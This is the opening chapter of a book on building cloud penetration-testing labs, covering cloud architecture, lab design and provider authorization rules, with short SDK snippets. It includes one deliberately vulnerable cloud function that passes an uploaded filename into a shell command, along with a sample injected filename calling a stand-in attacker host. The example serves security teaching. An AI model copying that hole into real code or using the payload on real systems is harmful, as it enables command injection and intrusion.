Building and Automating Penetration Testing Labs in the Cloud: Set up cost-effective hacking environments for learning cloud security on AWS, Azure, and GCP

By Joshua Arvin Lat

Product Details


Publication date : Oct 13, 2023
Length : 562 pages
Edition : 1st Edition
Language : English
ISBN-13 : 9781837632398

Getting Started with Penetration Testing Labs in the Cloud

The demand for cloud security professionals continues to increase as the number of cloud-related threats and incidents rises significantly every year. To manage the risks involved when learning cloud penetration testing and ethical hacking, security engineers seeking to advance their careers would benefit from having a solid understanding of how to set up penetration testing environments in the cloud.

In this introductory chapter, we will quickly go through the benefits of setting up penetration testing labs in the cloud. We will explore how modern cloud applications are designed, developed, and deployed as this will be essential when we build penetration testing labs in the succeeding chapters. In the final section of this chapter, we’ll delve deeper into several relevant factors to consider when designing and building vulnerable cloud infrastructures.

That said, we will cover the following topics:

  • Why build your penetration testing labs in the cloud?
  • Recognizing the impact of cloud computing on the cybersecurity landscape
  • Exploring how modern cloud applications are designed, developed, and deployed
  • Examining the considerations when building penetration testing lab environments in the cloud

With these in mind, let’s get started!

Why build your penetration testing labs in the cloud?

At some point in their careers, security professionals may build penetration testing labs where they can practice their skills safely in an isolated environment. At this point, you might be asking yourself: What’s inside a penetration testing lab environment?

Figure 1.1 – Penetration testing lab example

In Figure 1.1, we can see that a penetration testing lab environment is simply a controlled environment that hosts several vulnerable-by-design applications and services. These applications have known vulnerabilities and misconfigurations that can be exploited using the right set of tools and techniques. These vulnerabilities are incorporated to provide a realistic environment for penetration testers to practice and simulate real-world attack scenarios. In addition to this, security researchers and penetration testers can dive deeper into various attack vectors, explore new techniques for exploitation, and develop countermeasures.

Before going over the benefits of setting up our penetration testing labs in the cloud, let’s discuss why having a penetration testing lab environment is a great idea in the first place. Here are some of the reasons why such an environment is recommended:

  • Learning penetration testing in a dedicated lab environment helps you stay away from legal trouble. Attacking a system owned by another person or company is illegal without a contract, consent, or agreement.
  • Given that penetration tests may corrupt data, crash servers, and leave environments in an unstable state, having a separate penetration testing lab will help ensure that production environments are not affected by the possible side effects of penetration test simulations.
  • We may also use these lab environments while developing custom penetration testing tools to automate and speed up certain steps in the penetration testing process.
  • We can also practice defense evasion in these environments by setting up various defense mechanisms that could detect and block certain types of attacks.
  • We can hack lab environments to teach the fundamentals of penetration testing to security enthusiasts and beginners.
  • Penetration testing labs can be used to validate a newly disclosed vulnerability. These isolated environments can also be used to verify whether a previously known vulnerability has already been remediated after an update, a configuration change, or a patch has been applied.

Now that we have discussed why it is a good idea to have a penetration testing lab environment, it’s about time we talk about where we can host these hacking labs. In the past, most security practitioners set up their lab environments primarily on their local machines (for example, their personal computer or laptop). They invested in dedicated hardware where they could run virtual lab environments using VirtualBox or other virtualization software:

Figure 1.2 – Running penetration testing lab environments on your local machine

In Figure 1.2, we can see that a common practice in home lab environments involves creating snapshots (used to capture the current state) before tests are performed since certain steps in the penetration testing process may affect the configuration and stability of the target machine. These snapshots can then be used to revert and restore the setup to its original state so that security professionals and researchers can perform a series of tests and experiments without having to worry about the side effects of the previous tests.
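
As a quick illustration, assuming VirtualBox is installed and the target VM is named metasploitable (both names are placeholders for this sketch), the snapshot-and-restore workflow could be scripted with a few VBoxManage calls:

import subprocess

VM_NAME = "metasploitable"        # hypothetical VM name
SNAPSHOT_NAME = "before-pentest"  # label for the pre-test snapshot

# Capture the current state of the target VM before running any tests
subprocess.run(["VBoxManage", "snapshot", VM_NAME, "take", SNAPSHOT_NAME], check=True)

# ... run the penetration test simulations against the VM here ...

# Power the VM off and revert it to its pre-test state once we are done
subprocess.run(["VBoxManage", "controlvm", VM_NAME, "poweroff"], check=True)
subprocess.run(["VBoxManage", "snapshot", VM_NAME, "restore", SNAPSHOT_NAME], check=True)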

Note

In the past, one of the common targets that was set up in penetration testing lab environments was an intentionally vulnerable Linux image called Metasploitable. It contained various vulnerable running services mapped to several open ports waiting to be scanned and attacked. Practitioners would then set up an attacker machine using BackTrack Linux (now known as Kali Linux) that had been configured with a variety of tools, such as Nmap and Metasploit, to attack the target machine.

Of course, setting up a vulnerable-by-design lab environment on our local machines has its own set of challenges and limitations. These may include one or more of the following:

  • Setting up a penetration testing lab environment on our personal computer or laptop (most likely containing personal and work files) may have unintended consequences as the entire system might be compromised if the hacking lab environment is set up incorrectly. In the worst case, we might lose all our files when the system crashes completely due to hardware degradation or failure.
  • Virtual machines used in the lab environment can be resource-hungry. As a result, we may need a more expensive local setup to meet the demands of the virtual machines that are running.
  • Setting up a vulnerable lab environment can be time-consuming and may require prior knowledge of the tools and applications involved. The process of configuring and preparing the necessary components for a lab environment, such as vulnerable software or network setups, can be complex and demanding. It is essential to have a good understanding of the tools and their dependencies, which can be a limitation for those who are new to the field or have limited experience.
  • Certain vulnerabilities and misconfigurations may be hard to test, especially those that involve the usage and presence of a cloud service.

Note

In some cases, we may also encounter licensing issues that prevent us from using certain virtual machines, operating systems, and applications in our hacking lab environment.

To solve one or more of the challenges mentioned, it is a good idea to consider setting up our penetration testing labs in the cloud. Here are some of the advantages of setting up cloud penetration testing labs:

  • Lab environments hosted in the cloud may be closer to what actual production environments deployed in the cloud look like
  • We can manage costs significantly by running our hacking lab environment in the cloud for only a few hours and then deleting (or turning off) the cloud resources after the tests and experiments are finished (see the short sketch after this list)
  • Setting up the cloud lab environment ourselves will help us have a deeper understanding of the implementation and security configuration of the cloud resources deployed in the penetration testing lab environment
  • It is easier to grow the complexity of vulnerable lab environments in the cloud since resources can be provisioned right away without us having to worry about the prerequisite hardware requirements
  • Certain attacks are difficult to simulate locally but are relatively simple to carry out in cloud environments (for example, attacks on cloud functions, along with other serverless resources)
  • Setting up complex lab environments in the cloud may be faster with the help of automation tools, frameworks, and services
  • We don’t have to worry about the personal and work files stored on our local machine being deleted or stolen
  • It is easier to have multiple users practice penetration testing in hacking lab environments deployed in the cloud
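
Going back to the cost point in the preceding list, here is a minimal sketch of how running lab instances could be shut down after a session using the AWS SDK for Python (the Project=pentest-lab tag is a hypothetical labeling convention used only for this example):

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# Find running lab instances tagged with our hypothetical lab label
reservations = ec2.describe_instances(
    Filters=[
        {"Name": "tag:Project", "Values": ["pentest-lab"]},
        {"Name": "instance-state-name", "Values": ["running"]},
    ]
)["Reservations"]

instance_ids = [
    instance["InstanceId"]
    for reservation in reservations
    for instance in reservation["Instances"]
]

if instance_ids:
    # Stop (rather than terminate) the instances so that the lab can be resumed later
    ec2.stop_instances(InstanceIds=instance_ids)
    print("Stopped:", instance_ids)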

Note

In addition to these, learning penetration testing can be faster in the cloud. For one thing, downloading large files and setting up vulnerable VMs can be significantly faster in the cloud. In addition to this, rebuilding cloud environments is generally easier since there are various options to recreate and rebuild these lab environments.

At this point, we should know why it is a great idea to build our penetration testing lab environments in the cloud! In the next section, we’ll quickly discuss how cloud computing has influenced and shaped the modern cybersecurity landscape.

Recognizing the impact of cloud computing on the cybersecurity landscape

In the past, companies had to host their applications primarily in their data centers. Due to the operational overhead of managing their own data centers, most businesses have considered migrating their data and their workloads to the cloud. Some organizations have moved all their applications and data to the cloud, while others use a hybrid cloud architecture to host their applications in both on-premises data centers and in the cloud. Cloud computing has allowed companies to do the following:

  • Ensure continuous operations: High availability in the cloud ensures that applications and services remain accessible and operational, even in the event of failures or disruptions. By leveraging redundancy and fault-tolerant architectures offered by cloud providers, downtime is minimized, and uninterrupted access to resources is maintained.
  • Save money: No hardware infrastructure investment is needed to get started as cloud resources can be created and deleted within seconds or minutes. In addition to this, cloud platforms generally have a pay-per-use model for the usage of cloud resources.
  • Easily manage application workloads: Application workloads in the cloud can be managed remotely. In addition to this, resources can be scaled up and down easily, depending on what the business needs.
  • Easily manage data: Managing data becomes more streamlined and convenient in the cloud environment due to the availability of a wide range of services, features, and capabilities. Additionally, the virtually unlimited storage capacity offered by the cloud eliminates concerns related to handling large files. This enhanced data management capability in the cloud contributes to improved efficiency and scalability for companies.
  • Automate relevant processes: Building automated pipelines and workflows in the cloud is easier since most of the cloud services can be managed through application programming interfaces (APIs) and software development kits (SDKs).

With more companies storing their data in the cloud, there has been a significant increase in cloud attacks in the last couple of years. The attack surface has changed due to the rise of cloud computing, and along with it, the types of attacks have changed. Hackers can take advantage of vulnerable and misconfigured cloud resources, which can lead to sensitive data stored in the cloud being stolen.

What do we mean by attack surface?

Attack surface refers to the collective set of potential vulnerabilities within a system that can be exploited by attackers. It encompasses various elements, including network interfaces, APIs, user access points, operating systems, and deployed cloud resources. Understanding and managing the attack surface is crucial for assessing and mitigating security risks in the cloud as it allows organizations to identify and address potential weak points that could be targeted by malicious actors.

With this in mind, here is a quick list of relevant cyberattacks on cloud-based data and applications:

  • Attacks on vulnerable application servers and misconfigured cloud storage resources: Attacks on vulnerable and misconfigured cloud resources such as APIs, virtual machines, CI/CD pipelines, and storage resources have resulted in serious data breaches around the world. Identities and information stolen from data breaches are used for identity theft and phishing.
  • Ransomware attacks in the cloud: Sensitive data stored in the cloud is constantly being targeted by hackers. Ransomware victims are generally asked to pay the ransom in Bitcoin or other cryptocurrencies. Bitcoin and other cryptocurrencies let users maintain their anonymity. This, along with other techniques, makes it hard for authorities to track down ransomware hackers.
  • Cloud account hijacking: Once a hacker takes over an organization’s cloud account, the hacker can freely spin up resources, access sensitive files, and use resources inside the account to attack other companies and accounts.
  • Distributed Denial-of-Service (DDoS) and Denial-of-Wallet (DoW) attacks: During a DDoS attack, an attacker seeks to make an online service unavailable by overwhelming and flooding deployed cloud resources with generated traffic. During a DoW attack, similar techniques are used to inflict financial damage (due to a large bill).

Over the years, the quantity and quality of tools focusing on cloud security have increased as cloud security threats have evolved and become more widespread. More security tools and utilities have become available as the number of disclosed vulnerabilities has increased every year. These tools range from simple scripts to sophisticated frameworks and modules that can be configured to suit the needs of an attacker. Security professionals have seen tools and products evolve over time as well. In the past, cloud security products needed to be installed and set up by the internal teams of companies. In the past few years, more managed cloud-based tools and services have become available, most of which can be used immediately with minimal configuration. Here are some of the more recent security solutions that have become available for cloud security:

  • Various offensive security cloud tools and frameworks
  • Agentless vulnerability assessment tools for virtual machines in the cloud
  • Vulnerability assessment tools for container images
  • Vulnerability assessment tools and services for serverless compute resources
  • Machine learning-powered code security scanner tools and services
  • Cloud network security audit tools
  • Managed cloud firewalls
  • Managed cloud threat detection services
  • Artificial intelligence-powered security tools

At this point, we should have a better understanding of how cloud computing has shaped and influenced the cybersecurity landscape. In the next section, we will dive deeper into how modern applications are designed, developed, and deployed in the cloud.

Exploring how modern cloud applications are designed, developed, and deployed

One of the primary objectives when building our penetration testing labs is to prepare a vulnerable-by-design environment that mimics real cloud environments. That said, we must have a good understanding of how modern cloud applications look as this will equip us with the knowledge required to build the right environment for our needs.

Years ago, most applications that were deployed in the cloud were designed and developed as monolithic applications. This means that the frontend, backend, and database layers of the application’s architecture were built together as a single logical unit. Most of the time, multiple developers would work on a single code repository for a project. In addition to this, the entire application, along with the database, would most likely be deployed together as a single unit inside the same server or virtual machine (similar to what’s shown in the simplified diagram in Figure 1.3):

Figure 1.3 – Deployment of monolithic applications (simplified)

From a security standpoint, an attacker that’s able to get root access to the virtual machine hosting the application server would most likely be able to access and steal sensitive information stored in the database running on the same machine.

What do we mean by root access?

Root access refers to having complete administrative privileges and unrestricted control over a computer system or virtual machine. It grants the user the highest level of access and authority, enabling them to modify system files, install or uninstall software, and perform actions that are typically restricted to other users. In the context of security, if an attacker obtains root access to a virtual machine hosting an application server, it implies they have gained full control of the system. This can potentially lead to unauthorized access to sensitive data stored in databases residing on the same machine.

Of course, there are modern applications that are still designed and architected as monolithic applications due to the benefits of having this type of architecture. However, as we will see shortly, more teams around the world are starting with a distributed microservice architecture instead of a monolithic setup. One of the notable downsides of having a monolithic architecture is that development teams may have problems scaling specific layers of the application once more users start to use the system. Once the application starts to slow down, teams may end up vertically scaling the virtual machine where the application is running. With vertical scaling, the resources of a single server, such as CPU and RAM, are increased by upgrading its hardware or replacing it with a more powerful machine. This approach allows the server to handle higher workloads and demands by enhancing its capacity. In contrast, horizontal scaling involves adding more servers to distribute the load, allowing each server to handle a portion of the overall traffic. Given that vertical scaling is generally more expensive than horizontal scaling in the long term, cloud architects recommend a distributed multi-tier setup instead, since it allows us to horizontally scale only the infrastructure resources hosting the components of the application that actually need to scale.

For instance, in a distributed e-commerce application, instead of vertically scaling a single monolithic server to handle increased user traffic, the system can be designed with separate tiers for the web servers, application servers, and databases. By separating different tiers, it becomes possible to independently scale each tier based on its specific resource demands. For example, while the application server layer can scale horizontally to handle increased user traffic, the database layer can scale vertically to accommodate growing data storage requirements. This way, when traffic surges, the infrastructure can horizontally scale by adding more web servers to handle the increased load, resulting in a more cost-effective and scalable solution:

Figure 1.4 – Autoscaling setup

In addition to this, a distributed multi-tier setup can easily support the autoscaling of resources due to its inherent architectural design. This flexibility allows the system to automatically adjust resource allocation without manual intervention, ensuring optimal performance and resource utilization. If the traffic that’s received by the application is spiky or unpredictable, a cloud architect may consider having an autoscaling setup for specific layers of the application to ensure that the infrastructure resources hosting the application are not underutilized.
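
As a rough sketch of what such an autoscaling configuration might look like programmatically, the following snippet attaches a target tracking scaling policy to a hypothetical Auto Scaling group (the group name and target value are placeholders):

import boto3

autoscaling = boto3.client("autoscaling", region_name="us-east-1")

# Keep the group's average CPU utilization around 50% by scaling out and in automatically
autoscaling.put_scaling_policy(
    AutoScalingGroupName="webapp-asg",  # hypothetical group name
    PolicyName="cpu-target-tracking",
    PolicyType="TargetTrackingScaling",
    TargetTrackingConfiguration={
        "PredefinedMetricSpecification": {
            "PredefinedMetricType": "ASGAverageCPUUtilization"
        },
        "TargetValue": 50.0,
    },
)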

Note

Security professionals must take into account that the downsizing (scale-in) operation of an autoscaling setup may delete resources automatically once the traffic received by the application goes down. Misconfigured or incomplete autoscaling implementations generally do not have the recommended log rotation setup configured properly in production environments, which makes investigations harder since the logs stored in the compromised infrastructure resources or servers might be deleted during the automated downsizing operation.

At this point, we should have a good idea of how the initial cloud applications were designed and deployed. Fast forwarding to the present, here’s what a modern application may look like:

Figure 1.5 – What a modern cloud architecture looks like

Wow! That escalated quickly! In Figure 1.5, we can see that in addition to what was discussed already, modern application architectures may have one or more of the following as well:

  • Usage of Infrastructure as Code (IaC) solutions to automatically provision cloud resources: While building a modern cloud application, an organization could utilize IaC solutions to streamline the provisioning of cloud resources. For example, they might employ tools such as Terraform or AWS CloudFormation, defining their infrastructure requirements in code to automatically provision and configure resources such as virtual machines, storage, networking, and load balancers (a minimal provisioning sketch follows this list).
  • Usage of managed container services to ease the management of Kubernetes clusters: A company may opt to utilize managed container services to simplify the management of their Kubernetes clusters. For example, they could choose a managed Kubernetes service provided by a cloud platform, which would handle tasks such as cluster provisioning, scaling, and monitoring. This allows the company to focus on developing and deploying its application without the overhead of managing the underlying Kubernetes infrastructure.
  • A continuous integration and continuous deployment (CI/CD) pipeline: A company could set up a CI/CD pipeline to automate the process of integrating code changes, running tests, and deploying the application to the cloud. Developers would commit their code changes to a version control system, triggering an automated build process that compiles the code, runs tests, and generates artifacts. The CI/CD pipeline would then deploy the application to a staging environment for further testing and, upon successful validation, automatically promote it to a production environment.
  • Function-as-a-Service (FaaS) resources: An organization implementing a modern cloud application could utilize FaaS resources as part of their solution. For instance, they might design the application to leverage serverless functions to handle specific tasks or workflows. By breaking down the application into smaller, independent functions, the company can achieve greater scalability, reduce operational overhead, and improve resource utilization.
  • APIs consumed by web and mobile applications: A company could adopt a microservices architecture, where APIs are designed and exposed to be consumed by both web and mobile applications. In this scenario, the company would develop individual microservices that encapsulate specific functionalities and expose well-defined APIs. These APIs would then be consumed by the web and mobile applications. With this setup, there would be seamless communication and interaction between the frontend clients and the backend services.
  • Usage of managed firewalls and load balancers: An organization can leverage existing managed firewall services and solutions provided by their cloud provider, which would allow them to define and enforce security policies at the network level. In addition to this, they could utilize a load balancer service to distribute incoming traffic across multiple instances of their application. This will help ensure the scalability and high availability of modern cloud systems while removing the need to manage the underlying infrastructure and operating systems of these managed cloud resources.
  • Usage of artificial intelligence (AI) and machine learning (ML) services: A company implementing a modern cloud application could utilize AI-powered and ML-powered services by leveraging pre-trained models and APIs. For example, they could utilize an AI service for sentiment analysis to analyze customer feedback and improve user experience. In addition to this, they could also employ managed ML services for predictive analytics to enhance decision-making processes within the application.
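
To make the IaC point above a bit more concrete, here is a minimal sketch that provisions a single S3 bucket by submitting an inline CloudFormation template through the AWS SDK for Python (the stack name and the choice of resource are placeholders, not the book's lab setup):

import json
import boto3

cfn = boto3.client("cloudformation", region_name="us-east-1")

# A minimal CloudFormation template describing one S3 bucket
template = {
    "Resources": {
        "LabBucket": {
            "Type": "AWS::S3::Bucket"
        }
    }
}

# Provision the stack; the same definition can be versioned, rebuilt, or torn down at will
cfn.create_stack(
    StackName="pentest-lab-storage",
    TemplateBody=json.dumps(template),
)

# Tearing the environment down later is a single call as well:
# cfn.delete_stack(StackName="pentest-lab-storage")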

There has also been an observable shift in the use of more managed services globally as more companies migrate their workloads to the cloud. The managed services provided by cloud platforms have gradually replaced specific components in the system that were originally maintained manually by a company’s internal system administration team. For instance, companies are leveraging managed services such as Google Cloud Pub/Sub instead of setting up their own messaging systems such as RabbitMQ. This approach allows organizations to focus their valuable time and resources on other critical business requirements.

With managed services, a major portion of the maintenance work is handled and automated by the cloud platform instead of a company’s internal team members. Here are some of the advantages when using managed services:

  • Server security patches and operational maintenance work is handled internally by the cloud platform when using managed services. This allows the company’s internal team members to use their precious time to work on other important requirements. A good example would be Amazon SageMaker, where data scientists and ML engineers can concentrate on training and deploying ML models without having to worry about manual maintenance tasks.
  • Scaling is generally easier when using managed services, as a launched resource can easily be modified and scaled with an API call or through a user interface. In some cases, resources can easily have auto-scaling configured. When it comes to scaling, Azure Kubernetes Service (AKS) would be a great example as it enables easy resource scaling and adjustment of the number of pods running in the cluster.
  • Generally, cloud resources that are deployed have reliable monitoring and management tools installed already. In addition to this, the integration with other services from the same cloud platform is seamless and immediately available. At the same time, managed cloud services and resources usually have built-in practical automation features that are immediately available for use.

Note

Security professionals need to have a good idea of what’s possible and what’s not when managed services are used. For example, we are not able to access the underlying operating system of certain managed services as these were designed and implemented that way. A good example would be the managed NAT Gateway of the AWS cloud platform. In addition to this, security professionals need to be aware of other possible mechanisms available when using managed services. For example, in Amazon Aurora (a relational database management system built for the cloud), we also have the option to do passwordless authentication using an Identity and Access Management (IAM) role. This means that if an attacker manages to exfiltrate AWS credentials with the right set of permissions, the database records can be accessed and modified even without the database’s username and password.
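
As an illustration of the last point, the sketch below shows how a short-lived authentication token for an IAM-enabled database could be generated with nothing more than valid AWS credentials (the endpoint, port, and database username are placeholders):

import boto3

rds = boto3.client("rds", region_name="us-east-1")

# Hypothetical Aurora cluster endpoint and IAM-enabled database user
token = rds.generate_db_auth_token(
    DBHostname="lab-cluster.cluster-abc123.us-east-1.rds.amazonaws.com",
    Port=3306,
    DBUsername="iam_db_user",
)

# The token can now be used in place of a password when connecting to the database
# (for example, with a MySQL client over SSL), so exfiltrated AWS credentials with
# the right permissions are enough to reach the data
print(token[:60], "...")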

There has been a significant increase in the usage of containers in the last couple of years. If you are wondering what containers are, containers are simply lightweight, isolated environments that package applications and their dependencies to guarantee consistency and portability. Container images, on the other hand, act as self-contained executable packages, comprising the necessary files and configurations for running specific applications. Companies opt for containers because they offer quicker launch times, the capability to host multiple containers in one virtual machine, and consistent environments throughout the various development stages. Initially, companies were hesitant to use Docker containers for deployment in production. However, due to the latest advances and the release of production-ready tools such as Kubernetes, Docker Compose, and other similar container frameworks, more companies around the world have been using containers to host applications.

At this point, you might be wondering, What are the advantages of using containers? Here are a few reasons why companies would opt to utilize containers:

  • Launching new containers from container images is generally faster compared to creating new virtual machines and servers from images. This is because containers leverage lightweight virtualization and share the host system’s operating system, allowing them to start quickly without the need to boot an entire operating system. In addition to this, containers only require the necessary dependencies and libraries specific to the application, resulting in smaller image sizes and faster deployment times.
  • We can have multiple containers running inside a virtual machine (see the short sketch after this list). Having the ability to run multiple containers inside a virtual machine offers significant benefits in terms of resource utilization and scalability. Each container operates independently, allowing for processes and services to be isolated while sharing the underlying resources of the virtual machine. This enables efficient utilization of computing resources as multiple containers can run concurrently on the same hardware, optimizing the utilization of CPU, memory, and storage.
  • Using containers allows for seamless consistency across different environments, such as local development, staging, and production. With containerization, developers can package all necessary dependencies and configurations, ensuring that the application runs consistently across these environments. This approach promotes early consideration of environment consistency, enabling developers to detect and address any compatibility or deployment issues at an earlier stage in the development life cycle, leading to smoother deployments and reduced chances of environment-related errors.
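
For example, assuming the Docker Engine and the docker Python SDK are available on the machine (both are assumptions for this sketch), running two isolated web server containers side by side on the same host takes only a couple of calls:

import docker

client = docker.from_env()

# Run two lightweight web server containers on the same host, each mapped to a different port
client.containers.run("nginx:alpine", name="lab-web-1", detach=True, ports={"80/tcp": 8080})
client.containers.run("nginx:alpine", name="lab-web-2", detach=True, ports={"80/tcp": 8081})

# List the running containers sharing this machine's resources
for container in client.containers.list():
    print(container.name, container.status)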

In addition to these, nowadays, more managed cloud services already provide support for the usage of custom container environments, which gives developers the flexibility they need while ensuring that minimal work is done on the maintenance end. By leveraging these managed cloud services, developers can focus on application development and innovation while offloading the burden of infrastructure maintenance and ensuring optimal performance, scalability, and security for their containerized applications.

Note

Imagine a company developing a microservices-based application. By leveraging containers, they can encapsulate each microservice within its own container, allowing for independent development, testing, and deployment. This modular approach enables teams to iterate and update specific services without impacting the entire application stack. Furthermore, containers facilitate seamless scaling as demand fluctuates. When the application experiences increased traffic, container orchestration platforms such as Kubernetes automatically spin up additional instances of the required containers, ensuring optimal performance and resource utilization. This scalability allows businesses to efficiently handle peak loads without overprovisioning infrastructure.

That said, having a solid understanding of container security is critical due to the growing popularity of containers. Containers present unique security challenges that must be addressed to protect applications and data. By implementing effective container security measures, organizations can mitigate risks (such as unauthorized access, data breaches, and container breakouts) to ensure the security of critical systems and sensitive information.

Similar to containers, there’s also been a noticeable increase in the usage of FaaS services in the past couple of years. FaaS options from major cloud platforms, including AWS Lambda, Azure Functions, and Google Cloud Functions, allow developers and engineers to deploy and run custom application code inside isolated environments without having to worry about server management. Previously, developers had to handle server provisioning and configuration. However, with serverless functions, developers can focus on writing and deploying custom application code without worrying about infrastructure, resulting in a more efficient and streamlined development process. This shift enables rapid iteration, scalable deployments, and reduced operational overhead, significantly simplifying the lives of developers. Using these along with the other building blocks of event-driven architectures, developers can divide complex application code into smaller and more manageable components. To have a better understanding of how these services work, let’s quickly discuss some of the common properties of these cloud functions:

  • Scaling up and down is automatic
  • Usage follows a pay-per-use model
  • The runtime environment gets created and deleted when a function is invoked
  • No maintenance is needed since the cloud platform takes care of the maintenance work
  • There are resource limits on maximum execution time, memory, storage, and code package size
  • Functions are triggered by events

Important note

The terms FaaS and serverless computing are sometimes used interchangeably by professionals. However, they are two different concepts. FaaS primarily focuses on having a platform that speeds up the development and deployment of application code functions. On the other hand, serverless computing refers to the cloud computing execution model, which is generally characterized by the usage of event-driven architecture, managed services, along with per-usage billing. That said, it is possible to have a serverless implementation without utilizing a FaaS service (for example, a frontend-only single-page application (SPA) hosted using the static website hosting capability of a cloud storage service).

How is this relevant to cloud security and penetration testing? The design and implementation of cloud functions impact and influence the offensive and defensive security strategies of professionals. Developers and engineers need to make sure that the code that’s deployed inside cloud functions is safe from a variety of injection attacks. For one thing, creating a file and saving it inside a storage bucket with a filename that includes a malicious payload may trigger command execution once an event triggers the cloud function. In addition to this, security professionals must find alternative ways of maintaining persistence (after a successful breach) when dealing with cloud functions since the runtime environment gets created and deleted in seconds.
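
As a purely illustrative (and intentionally vulnerable) sketch of the filename injection scenario described above, consider a cloud function that builds a shell command from the object key of an uploaded file; an attacker-controlled filename such as "report.txt; curl attacker.example" would then be executed when the storage event triggers the function:

import os
import urllib.parse

def lambda_handler(event, context):
    # Extract the object key from the storage event notification
    key = urllib.parse.unquote_plus(event["Records"][0]["s3"]["object"]["key"])

    # VULNERABLE: the attacker-controlled filename is concatenated directly into a
    # shell command, so a key containing "; <command>" results in arbitrary command
    # execution inside the function's short-lived runtime environment
    os.system("file -b /tmp/" + key)

    return {"statusCode": 200}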

At this point, you should have a good idea of what modern cloud applications look like! There is a lot more we could discuss in this section, but this should do the trick for now. With everything we have learned so far, we can now proceed with diving deeper into what we should consider when designing and building penetration testing lab environments in the cloud.

Examining the considerations when building penetration testing lab environments in the cloud

In the succeeding chapters of this book, we will be designing and building multiple vulnerable-by-design labs in the cloud. After setting up each of the lab environments, we will simulate the penetration testing process to validate if the vulnerabilities present are exploitable. Before performing a penetration testing session in our cloud environments, we must be aware of the following:

  • What activities are allowed without notification or authorization
  • Whether the attack traffic will pass through the public internet
  • Whether we will perform network stress-testing
  • What our penetration testing lab environment looks like
  • What activities we will perform inside the environment
  • Whether we are testing the security of an application inside a server or we are testing the security of the configuration of a cloud service

In addition to these, we must be aware of the activities and actions prohibited by the cloud platforms. Here are a few examples of what’s not allowed in cloud environments:

  • Attempting social engineering attacks on employees of the cloud platforms
  • Attacking resources and trying to gain access to data owned by other account owners and users
  • Using cloud services in a way that goes against a platform’s Acceptable Use Policy and Terms of Service

Note that there’s a long list of prohibited actions and activities in the relevant documentation pages available online for each of the cloud platforms. You can find the relevant links to resources on the succeeding pages and in the Further reading section of this chapter.

We must also notify and contact the respective support and security teams of the cloud platform when needed. This will help ensure that we will not be breaking any rules, especially if we are unsure or if it is our first time performing penetration tests in the cloud.

Note

The best practice is to notify the cloud platform ahead of time to get authorization and approval. In some cases, an approval or notification is not required but filing a support ticket before performing penetration tests on your resources won’t hurt.

On some occasions, you might think that you no longer need to get authorization from the cloud provider since your penetration testing session will not harm other customers. However, this is not always the case as there might be actions that still require authorization from the cloud provider. Figure 1.6 shows a sample penetration testing lab environment on AWS:

Figure 1.6 – Sample penetration testing lab environment setup

This lab environment has the following components:

  • An attacker machine inside a VPC that prevents all outbound connections
  • A target machine that contains vulnerable applications and services
  • A VPC peering connection that allows traffic between the VPCs where the attacker and target EC2 instances are hosted, so that the attack traffic will pass through this VPC peering connection (see the sketch after this list)
  • An S3 bucket containing files accessed via AWS PrivateLink
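
To illustrate how the peering connection between the attacker and target VPCs could be created programmatically, here is a minimal sketch using the AWS SDK for Python (all resource IDs are placeholders):

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# Hypothetical VPC IDs for the attacker and target environments
peering = ec2.create_vpc_peering_connection(
    VpcId="vpc-attacker111",
    PeerVpcId="vpc-target222",
)
peering_id = peering["VpcPeeringConnection"]["VpcPeeringConnectionId"]

# Accept the request (both VPCs live in the same account in this lab)
ec2.accept_vpc_peering_connection(VpcPeeringConnectionId=peering_id)

# Route tables in each VPC still need routes pointing at the peering connection
# so that the attack traffic can flow between the two networks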

Performing penetration tests on an application running inside an EC2 instance requires no approval. On the other hand, performing penetration tests on your own S3 bucket in your AWS account is not allowed unless you get approval from AWS. Why? Performing penetration tests on an S3 bucket you own differs from performing penetration tests on an application hosted on S3. You must complete the Simulated Events Form and provide the required information to get authorization from AWS before performing penetration testing simulations on Amazon S3, along with other services not listed under Permitted Services on the Customer Service Policy for Penetration Testing page. Make sure you check out the following links before performing penetration tests on AWS:

It is important to note that penetration testing policies and guidelines differ across cloud platforms. Here are some of the resources and links you need to check before performing penetration tests on Azure:

Here are the relevant resources and links for GCP:

Note

Note that these policies and guidelines may change in the future, so make sure you review the guidelines before doing penetration tests on applications running in a cloud environment. Make sure you reach out to the support and security teams of the cloud platforms for guidance if you have questions and need clarification.

In addition to what has been discussed already, there are other things we need to consider, particularly in terms of security and engineering:

  • The performance requirements when choosing the cloud infrastructure resources needed for the lab: When building penetration testing lab environments in the cloud, it is crucial to consider the performance requirements and select the appropriate cloud infrastructure resources. This involves assessing factors such as network bandwidth, computational power, and storage capabilities to ensure the lab environment can effectively simulate real-world scenarios and handle the resource-intensive nature of security testing.
  • The overall cost of setting up, running, and maintaining the penetration lab: The cost of establishing, operating, and maintaining a penetration testing lab environment in the cloud should be considered in the context of security and engineering. This includes expenses related to resource provisioning, infrastructure management, and ongoing monitoring and updates.
  • The security and auditability of the environment, as the penetration testing lab must be protected from unwarranted external attacks: The lab must be protected from unwarranted external attacks by implementing robust security measures and controls. This includes utilizing security features offered by the cloud platform, such as network segmentation, access controls, and monitoring, to create a secure and auditable testing environment.
  • The scalability and modularity of the lab environment: Making lab environments scalable and modular allows you to efficiently customize the lab for a variety of scenarios and requirements, allowing penetration testers to effectively simulate and evaluate diverse attack scenarios.
  • The manageability of the lab versions: Utilizing version control systems and tools allows penetration testers to efficiently manage and track changes made to the lab environment configurations, software versions, and custom scripts. This ensures that the lab versions are easily maintainable and reproducible and can be rolled back or updated as needed.
  • The use of automation tools and services for fast rebuilds and setup: By leveraging automation, penetration testers can focus more on the actual testing and analysis rather than spending significant time on manual setup and maintenance tasks.

We could add a few more to this list, but these considerations should do for now. We will discuss these security and engineering considerations in detail in the next few chapters as we build a variety of vulnerable-by-design lab environments across the different cloud platforms.

Summary

In this chapter, we started with a quick discussion on the advantages of setting up a penetration testing lab in the cloud. We took a closer look at how cloud computing has influenced and shaped the modern cybersecurity landscape. We also explored how modern cloud applications are designed, developed, and deployed. We wrapped up this chapter by diving deeper into several important considerations when designing and building vulnerable environments in the cloud.

In the next chapter, we will proceed with setting up our first vulnerable lab environment in the cloud. After setting up our penetration testing lab, we will validate whether the vulnerabilities are exploitable using various offensive security tools and techniques.

Further reading

For more information on the topics covered in this chapter, feel free to check out the following resources:


Key benefits

  • Explore strategies for managing the complexity, cost, and security of running labs in the cloud
  • Unlock the power of infrastructure as code and generative AI when building complex lab environments
  • Learn how to build pentesting labs that mimic modern environments on AWS, Azure, and GCP
  • Purchase of the print or Kindle book includes a free PDF eBook

Description

